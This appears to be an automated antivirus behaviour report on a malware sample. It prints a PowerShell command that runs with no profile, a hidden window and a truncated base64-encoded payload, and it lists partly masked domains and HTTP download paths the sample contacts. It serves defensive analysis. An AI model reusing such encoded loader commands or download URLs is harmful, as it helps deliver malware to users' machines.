Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABiAHcATQBqAHMATgBHAEIAPQAnAEEAXwBuAFoAbQBvAEQAaQAnADsAJABpAGkAQgBLADIAMwBGAGEAIAA9ACAAJwA5ADkAOAAnADsAJABTAHcAcwBSAHAAagAxAD0AJwBUAGwAWABZAGoAbgB6ACcAOwAkAHcAdwA0AHIAbQBxAFYAPQAkAGUAb...
Network activity
Connects to
- 'fa##d.com':80
- 'yu####kanaeyou.com':80
- 'ab####ipping.com':443
- 'ay###rgo.com':80
- 'ay###rgo.com':443
TCP
HTTP GET requests
- http://fa##d.com/wp-includes/atc4485/
- http://yu####kanaeyou.com/cupido/ra73n6g4849/
- http://ay###rgo.com/cgi-bin/iu4/
Other
- 'ab####ipping.com':443
- 'ay###rgo.com':443
UDP
- DNS ASK fa##d.com
- DNS ASK yu####kanaeyou.com
- DNS ASK tr###sat.com
- DNS ASK ab####ipping.com
- DNS ASK ay###rgo.com
Miscellaneous
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABiAHcATQBqAHMATgBHAEIAPQAnAEEAXwBuAFoAbQBvAEQAaQAnADsAJABpAGkAQgBLADIAMwBGAGEAIAA9ACAAJwA5ADkAOAAnADsAJABTAHcAcwBSAHAAagAxAD0AJwBUAGwAWABZAGoAbgB6ACcAOwAkAHcAdwA0AHIAbQBxAFYAPQAkAGUAb...' (with hidden window)
